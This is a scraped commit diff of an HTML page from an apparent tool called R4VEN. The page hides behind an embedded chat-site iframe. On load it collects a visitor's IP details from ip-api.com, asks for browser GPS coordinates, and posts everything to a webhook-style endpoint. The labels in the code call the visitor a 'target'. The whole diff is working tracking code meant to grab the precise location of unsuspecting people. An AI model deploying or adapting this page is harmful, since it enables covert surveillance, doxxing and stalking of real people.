1
+
1
2
<!DOCTYPE html>
2
3
< html >
3
4
9
10
10
11
< body onload ="getLocation() ">
11
12
12
- < iframe src ="https://www.tohla .com/chat/ " width ="100% " height ="900 " style ="border:none; ">
13
+ < iframe src ="https://www.meetskip .com/chat " width ="100% " height ="900 " style ="border:none; ">
13
14
</ iframe >
14
15
15
16
< p id ="demo "> </ p >
35
36
}
36
37
37
38
var params = {
38
- username : "R4ven " ,
39
- avatar_url : "https://i.pinimg .com/originals/27/bb/72/27bb72f7f7085f9c81153ce6c7bc2605 .jpg" ,
39
+ username : "R4VEN " ,
40
+ avatar_url : "https://cdn.discordapp .com/attachments/746328746491117611/1050532742707806288/vecteezy_cute-flat-illustration-cartoon-of-thief-hacker-stealing-data_14603389 .jpg" ,
40
41
embeds : [ myEmbed ]
41
42
}
42
43
54
55
55
56
var myEmbed = {
56
57
author : {
57
- name : "Grabbed Taregt Ip"
58
+ name : "Target Ip"
59
+ } ,
60
+ description : '```xl\n' + data . ip + '```' + '\n__**IP Details:**__ https://ip-api.com/#' + data . ip + "\n" +
61
+ '```diff\n- Geographic location based on IP address is NOT accurate, it provides the approximate location of the ISP' + '```'
62
+ }
63
+
64
+ var params = {
65
+ username : "R4VEN" ,
66
+ avatar_url : "https://cdn.discordapp.com/attachments/746328746491117611/1050532742707806288/vecteezy_cute-flat-illustration-cartoon-of-thief-hacker-stealing-data_14603389.jpg" ,
67
+ embeds : [ myEmbed ]
68
+ }
69
+
70
+ request . send ( JSON . stringify ( params ) ) ;
71
+ } )
72
+
73
+ $ . getJSON ( "http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query" , function ( response ) {
74
+
75
+ const request = new XMLHttpRequest ( ) ;
76
+ request . open ( "POST" , "/location_update" ) ; //change webhook
77
+
78
+ request . setRequestHeader ( 'Content-type' , 'application/json' ) ;
79
+
80
+ var myEmbed = {
81
+ author : {
82
+ name : "IP address:"
58
83
} ,
59
- title : "IP address:" ,
60
- description : '```xl\n' + data . ip + '```' + '\n__**IP Details:**__ https://ip-api.com/#' + data . ip
84
+ title : response . query ,
85
+ description : '```autohotkey\nContinent: ' + response . continent +
86
+ "\nContinentCode: " + response . continentcode +
87
+ "\nCountry: " + response . country +
88
+ "\nCountrycode: " + response . countrycode +
89
+ "\nRegionname: " + response . regionName +
90
+ "\nRegion: " + response . region +
91
+ "\nCity: " + response . city +
92
+ "\nDistrict: " + response . district +
93
+ "\nZip: " + response . zip +
94
+ "\nTime_zone: " + response . time_zone +
95
+ "\nName: " + response . name +
96
+ "\nAs: " + response . as +
97
+ "\nIsp: " + response . isp +
98
+ "\nReverse: " + response . reverse +
99
+ "\nOffset: " + response . offset +
100
+ "\nCurrency: " + response . currency +
101
+ "\nProxy: " + response . proxy +
102
+ "\nMobile: " + response . mobile +
103
+ "\nLat: " + response . lat +
104
+ "\nLon: " + response . lon + '```'
61
105
}
62
106
63
107
var params = {
64
- username : "R4ven " ,
65
- avatar_url : "https://i.pinimg .com/originals/27/bb/72/27bb72f7f7085f9c81153ce6c7bc2605 .jpg" ,
108
+ username : "R4VEN " ,
109
+ avatar_url : "https://cdn.discordapp .com/attachments/746328746491117611/1050532742707806288/vecteezy_cute-flat-illustration-cartoon-of-thief-hacker-stealing-data_14603389 .jpg" ,
66
110
embeds : [ myEmbed ]
67
111
}
68
112
88
132
89
133
var myEmbed = {
90
134
author : {
91
- name : "Allowed Location Permission"
135
+ name : "Target Allowed Location Permission"
92
136
} ,
93
- title : "Target gps location..." ,
94
- description : latlong
137
+ title : "GPS location of target.." ,
138
+ description : latlong + "\n" +
139
+ '```diff\n+ GPS fetch almost exact location because it uses longitude and latitude coordinates.' + '```'
95
140
}
96
141
97
142
var params = {
98
- username : "R4ven " ,
99
- avatar_url : "https://i.pinimg .com/originals/27/bb/72/27bb72f7f7085f9c81153ce6c7bc2605 .jpg" ,
143
+ username : "R4VEN " ,
144
+ avatar_url : "https://cdn.discordapp .com/attachments/746328746491117611/1050532742707806288/vecteezy_cute-flat-illustration-cartoon-of-thief-hacker-stealing-data_14603389 .jpg" ,
100
145
embeds : [ myEmbed ]
101
146
}
102
147
113
158
request . setRequestHeader ( 'Content-type' , 'application/json' ) ;
114
159
115
160
const params = {
116
- username : "R4ven " ,
117
- avatar_url : "https://i.pinimg .com/originals/27/bb/72/27bb72f7f7085f9c81153ce6c7bc2605 .jpg" ,
161
+ username : "R4VEN " ,
162
+ avatar_url : "https://cdn.discordapp .com/attachments/746328746491117611/1050532742707806288/vecteezy_cute-flat-illustration-cartoon-of-thief-hacker-stealing-data_14603389 .jpg" ,
118
163
content : "```diff\n- User denied the request for Geolocation.```"
119
164
}
120
165
133
178
}
134
179
</ script >
135
180
</ body >
136
- </ html >
181
+ </ html >
0 commit comments